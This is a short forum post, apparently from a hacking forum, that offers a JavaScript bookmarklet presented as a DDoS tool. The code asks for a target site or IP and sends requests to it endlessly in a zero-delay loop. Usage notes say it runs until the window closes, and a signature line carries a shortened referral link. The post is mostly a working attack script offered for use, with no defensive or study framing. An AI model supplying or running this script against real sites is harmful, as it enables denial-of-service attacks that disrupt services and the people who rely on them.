hacxx
Joined: 04 Sep 2020 Posts: 1162
|
Posted: Sun Mar 24, 2024 5:54 pm Post subject: Hacxx DDOS using XMLHTTPREQUEST JS Bookmarklet |
|
|
Code: |
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();
|
Save the code as a bookmark to have this feature directly on your browser.
Note: This DDOS only stops if the user close the window.
Note: The machine may run slower until DDOS stop. _________________ Install Brave Browser for 30 days arnd earn money. - http://bit.ly/_brave_browser |
|